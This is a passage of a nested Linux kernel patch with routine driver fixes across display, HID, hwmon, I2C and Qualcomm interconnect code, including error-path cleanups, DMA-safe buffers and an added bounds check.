+ 
+ 			if (!detect_dp(link, &sink_caps, reason)) {
++				link->type = pre_connection_type;
++
+ 				if (prev_sink)
+ 					dc_sink_release(prev_sink);
+ 				return false;
+@@ -1349,6 +1352,8 @@ bool dc_link_detect(struct dc_link *link, enum dc_detect_reason reason)
+ 	bool is_delegated_to_mst_top_mgr = false;
+ 	enum dc_connection_type pre_link_type = link->type;
+ 
++	DC_LOGGER_INIT(link->ctx->logger);
++
+ 	is_local_sink_detect_success = detect_link_and_local_sink(link, reason);
+ 
+ 	if (is_local_sink_detect_success && link->local_sink)
+@@ -1359,6 +1364,9 @@ bool dc_link_detect(struct dc_link *link, enum dc_detect_reason reason)
+ 			link->dpcd_caps.is_mst_capable)
+ 		is_delegated_to_mst_top_mgr = discover_dp_mst_topology(link, reason);
+ 
++	DC_LOG_DC("%s: link_index=%d is_local_sink_detect_success=%d pre_link_type=%d link_type=%d\n", __func__,
++		 link->link_index, is_local_sink_detect_success, pre_link_type, link->type);
++
++
+ 	if (is_local_sink_detect_success &&
+ 			pre_link_type == dc_connection_mst_branch &&
+ 			link->type != dc_connection_mst_branch)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+index e4472c6be6c32..3fb4bcc343531 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_dccg.c
+@@ -271,8 +271,7 @@ static void dccg32_set_dpstreamclk(
+ 	dccg32_set_dtbclk_p_src(dccg, src, otg_inst);
+ 
+ 	/* enabled to select one of the DTBCLKs for pipe */
+-	switch (otg_inst)
+-	{
++	switch (dp_hpo_inst) {
+ 	case 0:
+ 		REG_UPDATE_2(DPSTREAMCLK_CNTL,
+ 			     DPSTREAMCLK0_EN,
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+index d0b46a3e01551..1a85509c12f23 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+@@ -1174,13 +1174,13 @@ unsigned int dcn32_calculate_dccg_k1_k2_values(struct pipe_ctx *pipe_ctx, unsign
+ 	if (is_dp_128b_132b_signal(pipe_ctx)) {
+ 		*k1_div = PIXEL_RATE_DIV_BY_1;
+ 		*k2_div = PIXEL_RATE_DIV_BY_1;
+-	} else if (dc_is_hdmi_tmds_signal(pipe_ctx->stream->signal) || dc_is_dvi_signal(pipe_ctx->stream->signal)) {
++	} else if (dc_is_hdmi_tmds_signal(stream->signal) || dc_is_dvi_signal(stream->signal)) {
+ 		*k1_div = PIXEL_RATE_DIV_BY_1;
+ 		if (stream->timing.pixel_encoding == PIXEL_ENCODING_YCBCR420)
+ 			*k2_div = PIXEL_RATE_DIV_BY_2;
+ 		else
+ 			*k2_div = PIXEL_RATE_DIV_BY_4;
+-	} else if (dc_is_dp_signal(pipe_ctx->stream->signal)) {
++	} else if (dc_is_dp_signal(stream->signal)) {
+ 		if (two_pix_per_container) {
+ 			*k1_div = PIXEL_RATE_DIV_BY_1;
+ 			*k2_div = PIXEL_RATE_DIV_BY_2;
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+index 26fc5cad7a770..a942e2812183a 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_resource.c
+@@ -2142,6 +2142,7 @@ static bool dcn32_resource_construct(
+ 	dc->caps.edp_dsc_support = true;
+ 	dc->caps.extended_aux_timeout_support = true;
+ 	dc->caps.dmcub_support = true;
++	dc->caps.seamless_odm = true;
+ 
+ 	/* Color pipeline capabilities */
+ 	dc->caps.color.dpp.dcn_arch = 1;
+diff --git a/drivers/gpu/drm/bridge/lontium-lt8912b.c b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+index a98efef0ba0e0..1b74a913f1b8f 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt8912b.c
++++ b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+@@ -659,8 +659,8 @@ static int lt8912_parse_dt(struct lt8912 *lt)
+ 
+ 	lt->hdmi_port = of_drm_find_bridge(port_node);
+ 	if (!lt->hdmi_port) {
+-		dev_err(lt->dev, "%s: Failed to get hdmi port\n", __func__);
+-		ret = -ENODEV;
++		ret = -EPROBE_DEFER;
++		dev_err_probe(lt->dev, ret, "%s: Failed to get hdmi port\n", __func__);
+ 		goto err_free_host_node;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index 4bbb84847ecb7..e0d36edd1e3fb 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -5186,6 +5186,7 @@ intel_crtc_prepare_cleared_state(struct intel_atomic_state *state,
+ 	 * only fields that are know to not cause problems are preserved. */
+ 
+ 	saved_state->uapi = crtc_state->uapi;
++	saved_state->inherited = crtc_state->inherited;
+ 	saved_state->scaler_state = crtc_state->scaler_state;
+ 	saved_state->shared_dpll = crtc_state->shared_dpll;
+ 	saved_state->dpll_hw_state = crtc_state->dpll_hw_state;
+diff --git a/drivers/gpu/drm/i915/display/intel_fbdev.c b/drivers/gpu/drm/i915/display/intel_fbdev.c
+index 9899b5dcd291d..968915000519f 100644
+--- a/drivers/gpu/drm/i915/display/intel_fbdev.c
++++ b/drivers/gpu/drm/i915/display/intel_fbdev.c
+@@ -175,7 +175,7 @@ static int intelfb_alloc(struct drm_fb_helper *helper,
+ 	}
+ 
+ 	if (IS_ERR(obj)) {
+-		drm_err(&dev_priv->drm, "failed to allocate framebuffer\n");
++		drm_err(&dev_priv->drm, "failed to allocate framebuffer (%pe)\n", obj);
+ 		return PTR_ERR(obj);
+ 	}
+ 
+@@ -208,6 +208,7 @@ static int intelfb_create(struct drm_fb_helper *helper,
+ 	bool prealloc = false;
+ 	void __iomem *vaddr;
+ 	struct drm_i915_gem_object *obj;
++	struct i915_gem_ww_ctx ww;
+ 	int ret;
+ 
+ 	mutex_lock(&ifbdev->hpd_lock);
+@@ -256,7 +257,7 @@ static int intelfb_create(struct drm_fb_helper *helper,
+ 
+ 	info = drm_fb_helper_alloc_fbi(helper);
+ 	if (IS_ERR(info)) {
+-		drm_err(&dev_priv->drm, "Failed to allocate fb_info\n");
++		drm_err(&dev_priv->drm, "Failed to allocate fb_info (%pe)\n", info);
+ 		ret = PTR_ERR(info);
+ 		goto out_unpin;
+ 	}
+@@ -288,13 +289,24 @@ static int intelfb_create(struct drm_fb_helper *helper,
+ 		info->fix.smem_len = vma->size;
+ 	}
+ 
+-	vaddr = i915_vma_pin_iomap(vma);
+-	if (IS_ERR(vaddr)) {
+-		drm_err(&dev_priv->drm,
+-			"Failed to remap framebuffer into virtual memory\n");
+-		ret = PTR_ERR(vaddr);
+-		goto out_unpin;
++	for_i915_gem_ww(&ww, ret, false) {
++		ret = i915_gem_object_lock(vma->obj, &ww);
++
++		if (ret)
++			continue;
++
++		vaddr = i915_vma_pin_iomap(vma);
++		if (IS_ERR(vaddr)) {
++			drm_err(&dev_priv->drm,
++				"Failed to remap framebuffer into virtual memory (%pe)\n", vaddr);
++			ret = PTR_ERR(vaddr);
++			continue;
++		}
+ 	}
++
++	if (ret)
++		goto out_unpin;
++
+ 	info->screen_base = vaddr;
+ 	info->screen_size = vma->size;
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt.c b/drivers/gpu/drm/i915/gt/intel_gt.c
+index c7db49749a636..d12ec092e62df 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt.c
+@@ -691,12 +691,12 @@ int intel_gt_init(struct intel_gt *gt)
+ 	if (err)
+ 		goto err_gt;
+ 
+-	intel_uc_init_late(&gt->uc);
+-
+ 	err = i915_inject_probe_error(gt->i915, -EIO);
+ 	if (err)
+ 		goto err_gt;
+ 
++	intel_uc_init_late(&gt->uc);
++
+ 	intel_migrate_init(&gt->migrate, gt);
+ 
+ 	intel_pxp_init(&gt->pxp);
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
+index 685ddccc0f26a..1e1fa20fb41c9 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
+@@ -1491,7 +1491,7 @@ int intel_guc_capture_print_engine_node(struct drm_i915_error_state_buf *ebuf,
+ 
+ 	if (!ebuf || !ee)
+ 		return -EINVAL;
+-	cap = ee->capture;
++	cap = ee->guc_capture;
+ 	if (!cap || !ee->engine)
+ 		return -ENODEV;
+ 
+@@ -1556,13 +1556,34 @@ int intel_guc_capture_print_engine_node(struct drm_i915_error_state_buf *ebuf,
+ 
+ #endif //CONFIG_DRM_I915_CAPTURE_ERROR
+ 
++static void guc_capture_find_ecode(struct intel_engine_coredump *ee)
++{
++	struct gcap_reg_list_info *reginfo;
++	struct guc_mmio_reg *regs;
++	i915_reg_t reg_ipehr = RING_IPEHR(0);
++	i915_reg_t reg_instdone = RING_INSTDONE(0);
++	int i;
++
++	if (!ee->guc_capture_node)
++		return;
++
++	reginfo = ee->guc_capture_node->reginfo + GUC_CAPTURE_LIST_TYPE_ENGINE_INSTANCE;
++	regs = reginfo->regs;
++	for (i = 0; i < reginfo->num_regs; i++) {
++		if (regs[i].offset == reg_ipehr.reg)
++			ee->ipehr = regs[i].value;
++		else if (regs[i].offset == reg_instdone.reg)
++			ee->instdone.instdone = regs[i].value;
++	}
++}
++
+ void intel_guc_capture_free_node(struct intel_engine_coredump *ee)
+ {
+ 	if (!ee || !ee->guc_capture_node)
+ 		return;
+ 
+-	guc_capture_add_node_to_cachelist(ee->capture, ee->guc_capture_node);
+-	ee->capture = NULL;
++	guc_capture_add_node_to_cachelist(ee->guc_capture, ee->guc_capture_node);
++	ee->guc_capture = NULL;
+ 	ee->guc_capture_node = NULL;
+ }
+ 
+@@ -1596,7 +1617,8 @@ void intel_guc_capture_get_matching_node(struct intel_gt *gt,
+ 		    (ce->lrc.lrca & CTX_GTT_ADDRESS_MASK)) {
+ 			list_del(&n->link);
+ 			ee->guc_capture_node = n;
+-			ee->capture = guc->capture;
++			ee->guc_capture = guc->capture;
++			guc_capture_find_ecode(ee);
+ 			return;
+ 		}
+ 	}
+diff --git a/drivers/gpu/drm/i915/i915_active.c b/drivers/gpu/drm/i915/i915_active.c
+index a9fea115f2d26..8ef93889061a6 100644
+--- a/drivers/gpu/drm/i915/i915_active.c
++++ b/drivers/gpu/drm/i915/i915_active.c
+@@ -92,8 +92,7 @@ static void debug_active_init(struct i915_active *ref)
+ static void debug_active_activate(struct i915_active *ref)
+ {
+ 	lockdep_assert_held(&ref->tree_lock);
+-	if (!atomic_read(&ref->count)) /* before the first inc */
+-		debug_object_activate(ref, &active_debug_desc);
++	debug_object_activate(ref, &active_debug_desc);
+ }
+ 
+ static void debug_active_deactivate(struct i915_active *ref)
+diff --git a/drivers/gpu/drm/i915/i915_gpu_error.h b/drivers/gpu/drm/i915/i915_gpu_error.h
+index efc75cc2ffdb9..56027ffbce51f 100644
+--- a/drivers/gpu/drm/i915/i915_gpu_error.h
++++ b/drivers/gpu/drm/i915/i915_gpu_error.h
+@@ -94,7 +94,7 @@ struct intel_engine_coredump {
+ 	struct intel_instdone instdone;
+ 
+ 	/* GuC matched capture-lists info */
+-	struct intel_guc_state_capture *capture;
++	struct intel_guc_state_capture *guc_capture;
+ 	struct __guc_capture_parsed_output *guc_capture_node;
+ 
+ 	struct i915_gem_context_coredump {
+diff --git a/drivers/gpu/drm/meson/meson_drv.c b/drivers/gpu/drm/meson/meson_drv.c
+index 3b24a924b7b97..eea433ade79d0 100644
+--- a/drivers/gpu/drm/meson/meson_drv.c
++++ b/drivers/gpu/drm/meson/meson_drv.c
+@@ -325,23 +325,23 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 
+ 	ret = meson_encoder_hdmi_init(priv);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	ret = meson_plane_create(priv);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	ret = meson_overlay_create(priv);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	ret = meson_crtc_create(priv);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	ret = request_irq(priv->vsync_irq, meson_irq, 0, drm->driver->name, drm);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	drm_mode_config_reset(drm);
+ 
+@@ -359,6 +359,9 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 
+ uninstall_irq:
+ 	free_irq(priv->vsync_irq, drm);
++unbind_all:
++	if (has_components)
++		component_unbind_all(drm->dev, drm);
+ exit_afbcd:
+ 	if (priv->afbcd.ops)
+ 		priv->afbcd.ops->exit(priv);
+diff --git a/drivers/gpu/drm/tiny/cirrus.c b/drivers/gpu/drm/tiny/cirrus.c
+index 354d5e854a6f0..b27e469e90217 100644
+--- a/drivers/gpu/drm/tiny/cirrus.c
++++ b/drivers/gpu/drm/tiny/cirrus.c
+@@ -455,7 +455,7 @@ static void cirrus_pipe_update(struct drm_simple_display_pipe *pipe,
+ 	if (state->fb && cirrus->cpp != cirrus_cpp(state->fb))
+ 		cirrus_mode_set(cirrus, &crtc->mode, state->fb);
+ 
+-	if (drm_atomic_helper_damage_merged(old_state, state, &rect))
++	if (state->fb && drm_atomic_helper_damage_merged(old_state, state, &rect))
+ 		cirrus_fb_blit_rect(state->fb, &shadow_plane_state->data[0], &rect);
+ }
+ 
+diff --git a/drivers/hid/hid-cp2112.c b/drivers/hid/hid-cp2112.c
+index 1e16b0fa310d1..27cadadda7c9d 100644
+--- a/drivers/hid/hid-cp2112.c
++++ b/drivers/hid/hid-cp2112.c
+@@ -1354,6 +1354,7 @@ static int cp2112_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	girq->parents = NULL;
+ 	girq->default_type = IRQ_TYPE_NONE;
+ 	girq->handler = handle_simple_irq;
++	girq->threaded = true;
+ 
+ 	ret = gpiochip_add_data(&dev->gc, dev);
+ 	if (ret < 0) {
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index fdb66dc065822..e906ee375298a 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -4378,6 +4378,8 @@ static const struct hid_device_id hidpp_devices[] = {
+ 	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb01e) },
+ 	{ /* MX Master 3 mouse over Bluetooth */
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb023) },
++	{ /* MX Master 3S mouse over Bluetooth */
++	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb034) },
+ 	{}
+ };
+ 
+diff --git a/drivers/hid/intel-ish-hid/ipc/ipc.c b/drivers/hid/intel-ish-hid/ipc/ipc.c
+index 15e14239af829..a49c6affd7c4c 100644
+--- a/drivers/hid/intel-ish-hid/ipc/ipc.c
++++ b/drivers/hid/intel-ish-hid/ipc/ipc.c
+@@ -5,6 +5,7 @@
+  * Copyright (c) 2014-2016, Intel Corporation.
+  */
+ 
++#include <linux/devm-helpers.h>
+ #include <linux/sched.h>
+ #include <linux/spinlock.h>
+ #include <linux/delay.h>
+@@ -621,7 +622,6 @@ static void	recv_ipc(struct ishtp_device *dev, uint32_t doorbell_val)
+ 	case MNG_RESET_NOTIFY:
+ 		if (!ishtp_dev) {
+ 			ishtp_dev = dev;
+-			INIT_WORK(&fw_reset_work, fw_reset_work_fn);
+ 		}
+ 		schedule_work(&fw_reset_work);
+ 		break;
+@@ -940,6 +940,7 @@ struct ishtp_device *ish_dev_init(struct pci_dev *pdev)
+ {
+ 	struct ishtp_device *dev;
+ 	int	i;
++	int	ret;
+ 
+ 	dev = devm_kzalloc(&pdev->dev,
+ 			   sizeof(struct ishtp_device) + sizeof(struct ish_hw),
+@@ -975,6 +976,12 @@ struct ishtp_device *ish_dev_init(struct pci_dev *pdev)
+ 		list_add_tail(&tx_buf->link, &dev->wr_free_list);
+ 	}
+ 
++	ret = devm_work_autocancel(&pdev->dev, &fw_reset_work, fw_reset_work_fn);
++	if (ret) {
++		dev_err(dev->devc, "Failed to initialise FW reset work\n");
++		return NULL;
++	}
++
+ 	dev->ops = &ish_hw_ops;
+ 	dev->devc = &pdev->dev;
+ 	dev->mtu = IPC_PAYLOAD_SIZE - sizeof(struct ishtp_msg_hdr);
+diff --git a/drivers/hwmon/hwmon.c b/drivers/hwmon/hwmon.c
+index 4218750d5a66b..9ed34b2e1f499 100644
+--- a/drivers/hwmon/hwmon.c
++++ b/drivers/hwmon/hwmon.c
+@@ -756,6 +756,7 @@ __hwmon_device_register(struct device *dev, const char *name, void *drvdata,
+ 	struct hwmon_device *hwdev;
+ 	const char *label;
+ 	struct device *hdev;
++	struct device *tdev = dev;
+ 	int i, err, id;
+ 
+ 	/* Complain about invalid characters in hwmon name attribute */
+@@ -825,7 +826,9 @@ __hwmon_device_register(struct device *dev, const char *name, void *drvdata,
+ 	hwdev->name = name;
+ 	hdev->class = &hwmon_class;
+ 	hdev->parent = dev;
+-	hdev->of_node = dev ? dev->of_node : NULL;
++	while (tdev && !tdev->of_node)
++		tdev = tdev->parent;
++	hdev->of_node = tdev ? tdev->of_node : NULL;
+ 	hwdev->chip = chip;
+ 	dev_set_drvdata(hdev, drvdata);
+ 	dev_set_name(hdev, HWMON_ID_FORMAT, id);
+@@ -837,7 +840,7 @@ __hwmon_device_register(struct device *dev, const char *name, void *drvdata,
+ 
+ 	INIT_LIST_HEAD(&hwdev->tzdata);
+ 
+-	if (dev && dev->of_node && chip && chip->ops->read &&
++	if (hdev->of_node && chip && chip->ops->read &&
+ 	    chip->info[0]->type == hwmon_chip &&
+ 	    (chip->info[0]->config[0] & HWMON_C_REGISTER_TZ)) {
+ 		err = hwmon_thermal_register_sensors(hdev);
+diff --git a/drivers/hwmon/it87.c b/drivers/hwmon/it87.c
+index 7bd154ba351b9..b45bd3aa5a653 100644
+--- a/drivers/hwmon/it87.c
++++ b/drivers/hwmon/it87.c
+@@ -486,6 +486,8 @@ static const struct it87_devices it87_devices[] = {
+ #define has_pwm_freq2(data)	((data)->features & FEAT_PWM_FREQ2)
+ #define has_six_temp(data)	((data)->features & FEAT_SIX_TEMP)
+ #define has_vin3_5v(data)	((data)->features & FEAT_VIN3_5V)
++#define has_scaling(data)	((data)->features & (FEAT_12MV_ADC | \
++						     FEAT_10_9MV_ADC))
+ 
+ struct it87_sio_data {
+ 	int sioaddr;
+@@ -3098,7 +3100,7 @@ static int it87_probe(struct platform_device *pdev)
+ 			 "Detected broken BIOS defaults, disabling PWM interface\n");
+ 
+ 	/* Starting with IT8721F, we handle scaling of internal voltages */
+-	if (has_12mv_adc(data)) {
++	if (has_scaling(data)) {
+ 		if (sio_data->internal & BIT(0))
+ 			data->in_scaled |= BIT(3);	/* in3 is AVCC */
+ 		if (sio_data->internal & BIT(1))
+diff --git a/drivers/i2c/busses/i2c-hisi.c b/drivers/i2c/busses/i2c-hisi.c
+index 76c3d8f6fc3c6..d30071f299879 100644
+--- a/drivers/i2c/busses/i2c-hisi.c
++++ b/drivers/i2c/busses/i2c-hisi.c
+@@ -339,7 +339,11 @@ static irqreturn_t hisi_i2c_irq(int irq, void *context)
+ 		hisi_i2c_read_rx_fifo(ctlr);
+ 
+ out:
+-	if (int_stat & HISI_I2C_INT_TRANS_CPLT || ctlr->xfer_err) {
++	/*
++	 * Only use TRANS_CPLT to indicate the completion. On error cases we'll
++	 * get two interrupts, INT_ERR first then TRANS_CPLT.
++	 */
++	if (int_stat & HISI_I2C_INT_TRANS_CPLT) {
+ 		hisi_i2c_disable_int(ctlr, HISI_I2C_INT_ALL);
+ 		hisi_i2c_clear_int(ctlr, HISI_I2C_INT_ALL);
+ 		complete(ctlr->completion);
+diff --git a/drivers/i2c/busses/i2c-imx-lpi2c.c b/drivers/i2c/busses/i2c-imx-lpi2c.c
+index 188f2a36d2fd6..9b2f9544c5681 100644
+--- a/drivers/i2c/busses/i2c-imx-lpi2c.c
++++ b/drivers/i2c/busses/i2c-imx-lpi2c.c
+@@ -503,10 +503,14 @@ disable:
+ static irqreturn_t lpi2c_imx_isr(int irq, void *dev_id)
+ {
+ 	struct lpi2c_imx_struct *lpi2c_imx = dev_id;
++	unsigned int enabled;
+ 	unsigned int temp;
+ 
++	enabled = readl(lpi2c_imx->base + LPI2C_MIER);
++
+ 	lpi2c_imx_intctrl(lpi2c_imx, 0);
+ 	temp = readl(lpi2c_imx->base + LPI2C_MSR);
++	temp &= enabled;
+ 
+ 	if (temp & MSR_RDF)
+ 		lpi2c_imx_read_rxfifo(lpi2c_imx);
+diff --git a/drivers/i2c/busses/i2c-mxs.c b/drivers/i2c/busses/i2c-mxs.c
+index d113bed795452..e0f3b3545cfe4 100644
+--- a/drivers/i2c/busses/i2c-mxs.c
++++ b/drivers/i2c/busses/i2c-mxs.c
+@@ -171,7 +171,7 @@ static void mxs_i2c_dma_irq_callback(void *param)
+ }
+ 
+ static int mxs_i2c_dma_setup_xfer(struct i2c_adapter *adap,
+-			struct i2c_msg *msg, uint32_t flags)
++			struct i2c_msg *msg, u8 *buf, uint32_t flags)
+ {
+ 	struct dma_async_tx_descriptor *desc;
+ 	struct mxs_i2c_dev *i2c = i2c_get_adapdata(adap);
+@@ -226,7 +226,7 @@ static int mxs_i2c_dma_setup_xfer(struct i2c_adapter *adap,
+ 		}
+ 
+ 		/* Queue the DMA data transfer. */
+-		sg_init_one(&i2c->sg_io[1], msg->buf, msg->len);
++		sg_init_one(&i2c->sg_io[1], buf, msg->len);
+ 		dma_map_sg(i2c->dev, &i2c->sg_io[1], 1, DMA_FROM_DEVICE);
+ 		desc = dmaengine_prep_slave_sg(i2c->dmach, &i2c->sg_io[1], 1,
+ 					DMA_DEV_TO_MEM,
+@@ -259,7 +259,7 @@ static int mxs_i2c_dma_setup_xfer(struct i2c_adapter *adap,
+ 		/* Queue the DMA data transfer. */
+ 		sg_init_table(i2c->sg_io, 2);
+ 		sg_set_buf(&i2c->sg_io[0], &i2c->addr_data, 1);
+-		sg_set_buf(&i2c->sg_io[1], msg->buf, msg->len);
++		sg_set_buf(&i2c->sg_io[1], buf, msg->len);
+ 		dma_map_sg(i2c->dev, i2c->sg_io, 2, DMA_TO_DEVICE);
+ 		desc = dmaengine_prep_slave_sg(i2c->dmach, i2c->sg_io, 2,
+ 					DMA_MEM_TO_DEV,
+@@ -563,6 +563,7 @@ static int mxs_i2c_xfer_msg(struct i2c_adapter *adap, struct i2c_msg *msg,
+ 	struct mxs_i2c_dev *i2c = i2c_get_adapdata(adap);
+ 	int ret;
+ 	int flags;
++	u8 *dma_buf;
+ 	int use_pio = 0;
+ 	unsigned long time_left;
+ 
+@@ -588,13 +589,20 @@ static int mxs_i2c_xfer_msg(struct i2c_adapter *adap, struct i2c_msg *msg,
+ 		if (ret && (ret != -ENXIO))
+ 			mxs_i2c_reset(i2c);
+ 	} else {
++		dma_buf = i2c_get_dma_safe_msg_buf(msg, 1);
++		if (!dma_buf)
++			return -ENOMEM;
++
+ 		reinit_completion(&i2c->cmd_complete);
+-		ret = mxs_i2c_dma_setup_xfer(adap, msg, flags);
+-		if (ret)
++		ret = mxs_i2c_dma_setup_xfer(adap, msg, dma_buf, flags);
++		if (ret) {
++			i2c_put_dma_safe_msg_buf(dma_buf, msg, false);
+ 			return ret;
++		}
+ 
+ 		time_left = wait_for_completion_timeout(&i2c->cmd_complete,
+ 						msecs_to_jiffies(1000));
++		i2c_put_dma_safe_msg_buf(dma_buf, msg, true);
+ 		if (!time_left)
+ 			goto timeout;
+ 
+diff --git a/drivers/i2c/busses/i2c-xgene-slimpro.c b/drivers/i2c/busses/i2c-xgene-slimpro.c
+index 63259b3ea5abd..3538d36368a90 100644
+--- a/drivers/i2c/busses/i2c-xgene-slimpro.c
++++ b/drivers/i2c/busses/i2c-xgene-slimpro.c
+@@ -308,6 +308,9 @@ static int slimpro_i2c_blkwr(struct slimpro_i2c_dev *ctx, u32 chip,
+ 	u32 msg[3];
+ 	int rc;
+ 
++	if (writelen > I2C_SMBUS_BLOCK_MAX)
++		return -EINVAL;
++
+ 	memcpy(ctx->dma_buffer, data, writelen);
+ 	paddr = dma_map_single(ctx->dev, ctx->dma_buffer, writelen,
+ 			       DMA_TO_DEVICE);
+diff --git a/drivers/interconnect/qcom/osm-l3.c b/drivers/interconnect/qcom/osm-l3.c
+index 333adb21e7176..46b538e6c07b6 100644
+--- a/drivers/interconnect/qcom/osm-l3.c
++++ b/drivers/interconnect/qcom/osm-l3.c
+@@ -294,7 +294,7 @@ static int qcom_osm_l3_probe(struct platform_device *pdev)
+ 	qnodes = desc->nodes;
+ 	num_nodes = desc->num_nodes;
+ 
+-	data = devm_kcalloc(&pdev->dev, num_nodes, sizeof(*node), GFP_KERNEL);
++	data = devm_kzalloc(&pdev->dev, struct_size(data, nodes, num_nodes), GFP_KERNEL);
+ 	if (!data)
+ 		return -ENOMEM;
+ 
+diff --git a/drivers/interconnect/qcom/qcm2290.c b/drivers/interconnect/qcom/qcm2290.c
+index 0da612d6398c5..a29cdb4fac03f 100644
+--- a/drivers/interconnect/qcom/qcm2290.c
++++ b/drivers/interconnect/qcom/qcm2290.c
+@@ -147,9 +147,9 @@ static struct qcom_icc_node mas_snoc_bimc_nrt = {
+ 	.name = "mas_snoc_bimc_nrt",
+ 	.buswidth = 16,
+ 	.qos.ap_owned = true,
+-	.qos.qos_port = 2,
++	.qos.qos_port = 3,
+ 	.qos.qos_mode = NOC_QOS_MODE_BYPASS,
+-	.mas_rpm_id = 163,
++	.mas_rpm_id = 164,
+ 	.slv_rpm_id = -1,
+ 	.num_links = ARRAY_SIZE(mas_snoc_bimc_nrt_links),
+ 	.links = mas_snoc_bimc_nrt_links,
+diff --git a/drivers/interconnect/qcom/sm8450.c b/drivers/interconnect/qcom/sm8450.c
+index e3a12e3d6e061..2d7a8e7b85ec2 100644
+--- a/drivers/interconnect/qcom/sm8450.c
++++ b/drivers/interconnect/qcom/sm8450.c
+@@ -1844,100 +1844,6 @@ static const struct qcom_icc_desc sm8450_system_noc = {
+ 	.num_bcms = ARRAY_SIZE(system_noc_bcms),
+ };
+ 
+-static int qnoc_probe(struct platform_device *pdev)
+-{
+-	const struct qcom_icc_desc *desc;
+-	struct icc_onecell_data *data;
+-	struct icc_provider *provider;
+-	struct qcom_icc_node * const *qnodes;
+-	struct qcom_icc_provider *qp;
+-	struct icc_node *node;
+-	size_t num_nodes, i;
+-	int ret;
+-
+-	desc = device_get_match_data(&pdev->dev);
+-	if (!desc)
+-		return -EINVAL;
+-
+-	qnodes = desc->nodes;
+-	num_nodes = desc->num_nodes;
+-
+-	qp = devm_kzalloc(&pdev->dev, sizeof(*qp), GFP_KERNEL);
+-	if (!qp)
+-		return -ENOMEM;
+-
+-	data = devm_kcalloc(&pdev->dev, num_nodes, sizeof(*node), GFP_KERNEL);
+-	if (!data)
+-		return -ENOMEM;
+-
+-	provider = &qp->provider;
+-	provider->dev = &pdev->dev;
+-	provider->set = qcom_icc_set;
+-	provider->pre_aggregate = qcom_icc_pre_aggregate;
+-	provider->aggregate = qcom_icc_aggregate;
+-	provider->xlate_extended = qcom_icc_xlate_extended;
+-	INIT_LIST_HEAD(&provider->nodes);
+-	provider->data = data;
+-
+-	qp->dev = &pdev->dev;
+-	qp->bcms = desc->bcms;
+-	qp->num_bcms = desc->num_bcms;
+-
+-	qp->voter = of_bcm_voter_get(qp->dev, NULL);
+-	if (IS_ERR(qp->voter))
+-		return PTR_ERR(qp->voter);
+-
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(&pdev->dev, "error adding interconnect provider\n");
+-		return ret;
+-	}
+-
+-	for (i = 0; i < qp->num_bcms; i++)
+-		qcom_icc_bcm_init(qp->bcms[i], &pdev->dev);
+-
+-	for (i = 0; i < num_nodes; i++) {
+-		size_t j;
+-
+-		if (!qnodes[i])
+-			continue;
+-
+-		node = icc_node_create(qnodes[i]->id);
+-		if (IS_ERR(node)) {
+-			ret = PTR_ERR(node);
+-			goto err;
+-		}
+-
+-		node->name = qnodes[i]->name;
+-		node->data = qnodes[i];
+-		icc_node_add(node, provider);
+-
+-		for (j = 0; j < qnodes[i]->num_links; j++)
+-			icc_link_create(node, qnodes[i]->links[j]);
+-
+-		data->nodes[i] = node;
+-	}
+-	data->num_nodes = num_nodes;
+-
+-	platform_set_drvdata(pdev, qp);
+-
+-	return 0;
+-err:
+-	icc_nodes_remove(provider);
+-	icc_provider_del(provider);
+-	return ret;
+-}
+-
+-static int qnoc_remove(struct platform_device *pdev)
+-{
+-	struct qcom_icc_provider *qp = platform_get_drvdata(pdev);
+-
+-	icc_nodes_remove(&qp->provider);
+-	icc_provider_del(&qp->provider);
+-
+-	return 0;
+-}
+-
+ static const struct of_device_id qnoc_of_match[] = {
+ 	{ .compatible = "qcom,sm8450-aggre1-noc",
+ 	  .data = &sm8450_aggre1_noc},
